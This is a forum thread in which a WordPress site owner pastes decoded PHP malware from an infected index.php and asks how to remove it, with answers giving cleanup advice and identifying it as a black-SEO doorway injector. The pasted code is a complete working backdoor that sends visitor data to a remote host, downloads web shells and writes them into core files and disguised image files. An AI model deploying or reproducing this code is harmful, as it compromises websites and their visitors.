I don’t know the name, but it places .htacces everywhere, how to remove the virus?

@

@nonconformiste2021-08-31 01:58:41

Malware

@nonconformiste, 2021-08-31 01:58:41

This is the second time I've had this infection. As far as I understand, the ultimate goal of the virus is to place .htacces everywhere so that there would be a 403 error everywhere, and then either get in touch or simply offer to unlock for money.

I scan with an antivirus, I deleted all the malicious files, but one file stubbornly does not want to be deleted, in the index.php root folder. The malicious code itself is obfuscated, the decode shows this:

<?php error_reporting(0);
$go_domain = "om814-2.thecutecar.online";
$language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
$userrefer = $_SERVER['HTTP_REFERER'] ? $_SERVER['HTTP_REFERER'] : "";
$useragent = $_SERVER['HTTP_USER_AGENT'] ? $_SERVER['HTTP_USER_AGENT'] : "";
$userip = '';
@$timezone_out = date_default_timezone_get();
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
    $userip = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
    $userip = $_SERVER['REMOTE_ADDR'];
}
$ips = explode(",", $userip);
$userip = trim(current($ips));
$http = 'http';
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}
$index_url = "http://$go_domain/index.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s";
$sitemap_url = "http://$go_domain/sitemap.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s";
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
$uri_script = "";
if (strstr($uri, ".php")) {
    $uri_arr = explode(".php", $uri);
    $uri_script = $uri_arr[0] . ".php?";
    $uri = $uri_arr[1];
    $uri = str_replace("?", "/", $uri);
}
@$action = $_GET['ac'] ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    $index_name = basename($_SERVER['SCRIPT_NAME']);;
    write($index_name);
    echo "write done!";
    exit();
} elseif ($action != "" && $action == "check") {
    check();
    exit();
} elseif ($action != "" && $action == "sitemap") {
    $sitemap = "https://www.google.com/webmasters/sitemaps/ping?sitemap=$http://$host/sitemap.xml";
    $contents = file_get_contents($sitemap);
    echo $contents;
    exit();
} elseif ($action != "" && $action == "robots") {
    $data = 'User-agent: *
Allow: /';
    $uri_script = trim($uri_script);
    if ($uri_script != "" && $uri_script != "/index.php?") {
        $data = trim($data) . "
" . "Sitemap: $http://" . $host . $uri_script . "sitemap.xml";
    } else {
        $data = trim($data) . "
" . "Sitemap: $http://" . $host . "/sitemap.xml";
    }
    $num = mt_rand(80, 99);
    for ($i = 0;$i < $num;$i++) {
        if (trim($uri_script) != "" && $uri_script != "/index.php?") {
            $data = trim($data) . "
" . "Sitemap: $http://" . $host . $uri_script . "sitemap$i.xml";
        } else {
            $data = trim($data) . "
" . "Sitemap: $http://" . $host . "/sitemap$i.xml";
        }
    }
    @chmod("robots.txt", 0755);
    file_put_contents("robots.txt", $data);
    echo "robots write done!!";
    exit();
}
if (preg_match('@^/sitemap(\d+)[email protected]', $uri)) {
    $request = sprintf($sitemap_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language));
    $content = get($request);
    @header("Content-type: text/xml");
    if (trim($uri_script) != "") {
        $content = str_ireplace($http . "://" . $host . "/", $http . "://" . $host . $uri_script, $content);
    }
    $date_str = date("Y-m-d\TH:i:sP", time());
    $content = str_replace("{###data_str###}", $date_str, $content);
    echo trim($content);
    exit();
} elseif (substr($uri, -4) == ".css") {
    $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip);
    $content = get($request);
    if (strstr($content, 'okhtmlgetcontent')) {
        @header("Content-type: text/css; charset=utf-8");
        $content = str_replace("okhtmlgetcontent", '', $content);
        echo trim($content);
        exit();
    }
} else {
    $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip);
    $content = get($request);
    if (trim($uri_script) != "") {
        $content = str_ireplace($http . "://" . $host . "/", $http . "://" . $host . $uri_script, $content);
    }
    $date_str = date("Y-m-d\TH:i:sP", time());
    $content = str_replace("{#date_str}", $date_str, $content);
    if (strstr($content, 'okhtmlgetcontent')) {
        @header("Content-type: text/html; charset=utf-8");
        $content = str_replace("okhtmlgetcontent", '', $content);
        echo trim($content);
        exit();
    } else if (strstr($content, 'getcontent404page')) {
        @header('HTTP/1.1 404 Not Found');
        echo "404 Not Found";
        exit();
    } else if (strstr($content, 'getcontent301page')) {
        @header('HTTP/1.1 301 Moved Permanently');
        $content = str_replace("getcontent301page", '', $content);
        header('Location: ' . trim($content));
        exit();
    } else if (strstr($content, 'getcontent500page')) {
        @header('HTTP/1.1 500 Internal Server Error');
        $content = str_replace("getcontent500page", '', $content);
        echo "500 Internal Server Error";
        exit();
    }
}
function write($index_name) {
    $write1 = get("http://hello.firstguide.xyz/write1.txt");
    $write2 = get("http://hello.firstguide.xyz/write2.txt");
    $shell_postfs = get("http://hello.firstguide.xyz/mm1.txt");
    $shell_load = get("http://hello.firstguide.xyz/mm2.txt");
    $ht_content = file_get_contents(".htaccess");
    $index_content = file_get_contents($index_name);
    $loader_php = "wp-includes/template-loader.php";
    $load_php = "wp-includes/load.php";
    $font_editor_php = "wp-includes/SimplePie/index.php";
    if (!is_dir("css")) {
        mkdir("css", 0755, true);
    }
    if ($index_name != "index.php") {
        $write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
        $write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
    }
    file_put_contents("css/load.php", $shell_load);
    if (is_dir("wp-includes/SimplePie")) {
        file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
        file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
        file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
        file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
        $loader_content = file_get_contents($loader_php);
        $load_content = file_get_contents($load_php);
        @chmod($loader_php, 0755);
        @chmod($load_php, 0755);
        file_put_contents($loader_php, $write1 . $loader_content);
        file_put_contents($load_php, $load_content . $write2);
        @chmod($loader_php, 0644);
        @chmod($load_php, 0644);
        file_put_contents($font_editor_php, $shell_postfs);
    }
}
function check() {
    $new_ht_content = get("http://hello.firstguide.xyz/shl/htaccess.txt");
    @chmod(".htaccess", 0755);
    $ht_content = file_get_contents(".htaccess");
    file_put_contents(".htaccess", $new_ht_content);
    @chmod(".htaccess", 0444);
}
function get($url) {
    $contents = @file_get_contents($url);
    if (!$contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $contents = curl_exec($ch);
        curl_close($ch);
    }
    return $contents;
}
function is_https() {
    if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    } elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return true;
    }
    return false;
}

Who faced, what do you think?)

Reply

Answer the question

In order to leave comments, you need to log in

2 answer(s)

A

Artem Zolin, 2021-08-31
@artzolin

Remove all unlicensed plugins and themes
Remove all questionable plugins
Reupload the kernel
Clean the base
Sort out a self-written theme by hand

F

fStrange, 2021-09-01
@fStrange

Insertion into the index through some kind of shell. Automatic antivirus and any plugins are not able to detect all of them. Only on the tops are enough.
Tips like adding a plugin to protect against Wordfence or Succuri don't work here either. They are more or less effective before penetration rather than after.
In general, there are only two options. And the first one can't always help.
1. deep rollback, before the date of the appearance of viruses, preferably long. For two months.
Then, after the rollback, update the VP, update the plugins and change the passwords of the admins and in the database.
2. turn to a specialist like me (I specialize in removal and protection. 9 months warranty on VP), who will search manually.

As far as I understand, the ultimate goal of the virus is to place .htacces everywhere so that there would be a 403 error everywhere, and then either get in touch or simply offer to unlock for money.

No. Nobody will contact. Hacking is automatic. The goal of the virus is to add a doorway or something similar and drain traffic to its pages. Black SEO.